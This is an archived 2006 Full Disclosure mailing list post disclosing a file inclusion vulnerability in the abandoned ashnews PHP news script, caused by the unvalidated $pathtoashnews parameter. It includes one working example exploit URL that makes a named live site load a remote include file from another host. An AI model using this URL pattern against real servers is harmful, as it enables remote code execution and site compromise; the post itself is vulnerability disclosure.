Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: ashnews Cross-Site Scripting Vulnerability
From: DanB-FD <dan-fd () f-box org>
Date: Tue, 31 Jan 2006 10:43:19 +0000


Dan B UK wrote:

Due to the nature of the issue I am not disclosing the detail of it until the writer of the software has updated it; maybe you could have waited??

A vulnerability that allows privileges of the apache user within the limitations of how much PHP has been locked down.

Since the author of the product has got back to me with the following I think it is ok to disclose the issue now.

"That is a known error. Unfortunately I have completely abondoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek"

The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion.

eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )

DanB UK.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]